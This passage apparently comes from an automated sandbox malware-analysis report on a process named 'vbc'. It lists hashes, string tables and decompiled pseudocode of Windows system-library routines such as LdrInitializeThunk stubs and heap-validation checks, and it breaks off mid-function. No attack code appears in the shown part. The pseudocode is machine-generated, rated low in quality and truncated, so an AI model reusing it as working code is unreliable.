                                                  • Opcode Fuzzy Hash: ff4b968fbf5e0b5b32b45d03051269c5a77d4c9c88c09bb95959c8816ff6b897
                                                  • Instruction Fuzzy Hash: 1390026921300002D18575D9580960B0009A7D1242F91D515A000555CCD99588696361
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F97A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 10 15f97a0-15f97ac LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 1422fbd426544c99b593832d908bf09f050951ff15cbae124f2dbffd800cd0a2
                                                  • Instruction ID: 5bba2d35229331e0db8169388652fba043d0a7daf6c7f503fe78679fcd8bc212
                                                  • Opcode Fuzzy Hash: 1422fbd426544c99b593832d908bf09f050951ff15cbae124f2dbffd800cd0a2
                                                  • Instruction Fuzzy Hash: E890026130100003D14575D958196074009F7E1341F51D111E0404558CE99588566262
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 6 15f9660-15f966c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: d1babf5c5054611e62e4378c9b1dd0820d47befdcc7d1492c7bab2cb969ef5c1
                                                  • Instruction ID: 5c9b89a8bb855a1a58ad43c10b53f72c983b4df9e98344eb2b6f45834cbc9f71
                                                  • Opcode Fuzzy Hash: d1babf5c5054611e62e4378c9b1dd0820d47befdcc7d1492c7bab2cb969ef5c1
                                                  • Instruction Fuzzy Hash: 8D90027120100802D18575D9480564B0009A7D1341F91C115A0015658DDA958A5977E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 7 15f96e0-15f96ec LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 2b027dcd54f0bffe2d1d19f340317a230930dbead4ce892220309f5a2d048bb3
                                                  • Instruction ID: 0bc316eee308e78830d184e57973297e86f1a29bafe6688f0c7109919538247b
                                                  • Opcode Fuzzy Hash: 2b027dcd54f0bffe2d1d19f340317a230930dbead4ce892220309f5a2d048bb3
                                                  • Instruction Fuzzy Hash: DB90027120108802D11565D9880574B0009A7D0341F55C511A441465CDD6D588917161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 15f967a-15f967f 1 15f968f-15f9696 LdrInitializeThunk 0->1 2 15f9681-15f9688 0->2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6a4049a6445b167342ffbd3d6a40ebe46e68f3b6d42ba443b19faf2869ea2ca6
                                                  • Instruction ID: 394b7a9dbfc9244a7da8e0c30a5a75afe48d4a57d1b1410010f2cffc12c6875a
                                                  • Opcode Fuzzy Hash: 6a4049a6445b167342ffbd3d6a40ebe46e68f3b6d42ba443b19faf2869ea2ca6
                                                  • Instruction Fuzzy Hash: 1BB09B719014C5C5D616D7E54A0871B7A047BD0745F16C155E2020645B8778C091F5B5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 0166B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Strings
                                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0166B53F
                                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0166B3D6
                                                  • This failed because of error %Ix., xrefs: 0166B446
                                                  • *** enter .exr %p for the exception record, xrefs: 0166B4F1
                                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0166B476
                                                  • read from, xrefs: 0166B4AD, 0166B4B2
                                                  • *** Inpage error in %ws:%s, xrefs: 0166B418
                                                  • *** enter .cxr %p for the context, xrefs: 0166B50D
                                                  • an invalid address, %p, xrefs: 0166B4CF
                                                  • The resource is owned shared by %d threads, xrefs: 0166B37E
                                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0166B305
                                                  • The instruction at %p referenced memory at %p., xrefs: 0166B432
                                                  • The resource is owned exclusively by thread %p, xrefs: 0166B374
                                                  • a NULL pointer, xrefs: 0166B4E0
                                                  • Go determine why that thread has not released the critical section., xrefs: 0166B3C5
                                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0166B2F3
                                                  • The critical section is owned by thread %p., xrefs: 0166B3B9
                                                  • write to, xrefs: 0166B4A6
                                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0166B2DC
                                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0166B38F
                                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0166B314
                                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 0166B352
                                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0166B47D
                                                  • The instruction at %p tried to %s , xrefs: 0166B4B6
                                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0166B39B
                                                  • *** then kb to get the faulting stack, xrefs: 0166B51C
                                                  • <unknown>, xrefs: 0166B27E, 0166B2D1, 0166B350, 0166B399, 0166B417, 0166B48E
                                                  • *** An Access Violation occurred in %ws:%s, xrefs: 0166B48F
                                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0166B484
                                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0166B323
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                  • API String ID: 0-108210295
                                                  • Opcode ID: 4fcef1b542dc2093aa79f59bfe7f9e72190acd537f259ca5d8f8321e6b9f3a3f
                                                  • Instruction ID: 83abf13481406dc9ec3a009ee2b0aea72a35c2aeca9f47127ee24f1f96b85355
                                                  • Opcode Fuzzy Hash: 4fcef1b542dc2093aa79f59bfe7f9e72190acd537f259ca5d8f8321e6b9f3a3f
                                                  • Instruction Fuzzy Hash: 8681F271B81210FFDB21AA4ADC46DBF3B3AFF56A51F80405CF605AF212D3618452CAB6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01671C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 44%
                                                  			E01671C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x15948a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E015BB150();
				} else {
					E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x16a589c);
				E015BB150("Heap error detected at %p (heap handle %p)\n",  *0x16a58a0);
				_t27 =  *0x16a5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01671E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E015BB150();
				} else {
					E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E015BB150("Error code: %d - %s\n",  *0x16a5898);
				_t113 =  *0x16a58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E015BB150();
					} else {
						E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E015BB150("Parameter1: %p\n",  *0x16a58a4);
				}
				_t115 =  *0x16a58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E015BB150();
					} else {
						E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E015BB150("Parameter2: %p\n",  *0x16a58a8);
				}
				_t117 =  *0x16a58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E015BB150();
					} else {
						E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E015BB150("Parameter3: %p\n",  *0x16a58ac);
				}
				_t119 =  *0x16a58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E015BB150();
					} else {
						E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x16a58b4);
					E015BB150("Last known valid blocks: before - %p, after - %p\n",  *0x16a58b0);
				} else {
					_t120 =  *0x16a58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E015BB150();
				} else {
					E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E015BB150("Stack trace available at %p\n", 0x16a58c0);
			}











                                                  0x01671c10
                                                  0x01671c16
                                                  0x01671c1e
                                                  0x01671c3d
                                                  0x01671c3e
                                                  0x01671c20
                                                  0x01671c35
                                                  0x01671c3a
                                                  0x01671c44
                                                  0x01671c55
                                                  0x01671c5a
                                                  0x01671c65
                                                  0x01671c67
                                                  0x00000000
                                                  0x01671c6e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01671c67
                                                  0x01671cdc
                                                  0x01671ce5
                                                  0x01671d04
                                                  0x01671d05
                                                  0x01671ce7
                                                  0x01671cfc
                                                  0x01671d01
                                                  0x01671d0b
                                                  0x01671d17
                                                  0x01671d1f
                                                  0x01671d25
                                                  0x01671d30
                                                  0x01671d4f
                                                  0x01671d50
                                                  0x01671d32
                                                  0x01671d47
                                                  0x01671d4c
                                                  0x01671d61
                                                  0x01671d67
                                                  0x01671d68
                                                  0x01671d6e
                                                  0x01671d79
                                                  0x01671d98
                                                  0x01671d99
                                                  0x01671d7b
                                                  0x01671d90
                                                  0x01671d95
                                                  0x01671daa
                                                  0x01671db0
                                                  0x01671db1
                                                  0x01671db7
                                                  0x01671dc2
                                                  0x01671de1
                                                  0x01671de2
                                                  0x01671dc4
                                                  0x01671dd9
                                                  0x01671dde
                                                  0x01671df3
                                                  0x01671df9
                                                  0x01671dfa
                                                  0x01671e00
                                                  0x01671e0a
                                                  0x01671e13
                                                  0x01671e32
                                                  0x01671e33
                                                  0x01671e15
                                                  0x01671e2a
                                                  0x01671e2f
                                                  0x01671e39
                                                  0x01671e4a
                                                  0x01671e02
                                                  0x01671e02
                                                  0x01671e08
                                                  0x00000000
                                                  0x00000000
                                                  0x01671e08
                                                  0x01671e5b
                                                  0x01671e7a
                                                  0x01671e7b
                                                  0x01671e5d
                                                  0x01671e72
                                                  0x01671e77
                                                  0x01671e95

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                  • API String ID: 0-2897834094
                                                  • Opcode ID: 0953cc7a44a161ea3bb74d725c053254c6d3e7658d0f1df25542c3f48b8ef212
                                                  • Instruction ID: d340e171d7320ee6b207cedd00ca8cd58d624117a09fb90720b35866d55f6f10
                                                  • Opcode Fuzzy Hash: 0953cc7a44a161ea3bb74d725c053254c6d3e7658d0f1df25542c3f48b8ef212
                                                  • Instruction Fuzzy Hash: 2661F4335A0156DFD721AB89ECC6E2873E8FB05930B5A842FF50A5F301D6B89D418F5A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01674AEF Relevance: 11.8, Strings: 9, Instructions: 529COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 59%
                                                  			E01674AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E015BB150();
						} else {
							E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E015BB150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E015BB150();
					} else {
						E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E0166FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E015BB150();
						} else {
							E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E015BB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E015BB150();
								} else {
									E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E015BB150();
									} else {
										E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E015BB150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E0166FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E015BB150();
										} else {
											E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E0160D540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E015BB150();
								} else {
									E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E0167A80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E015DE12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E0167A80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
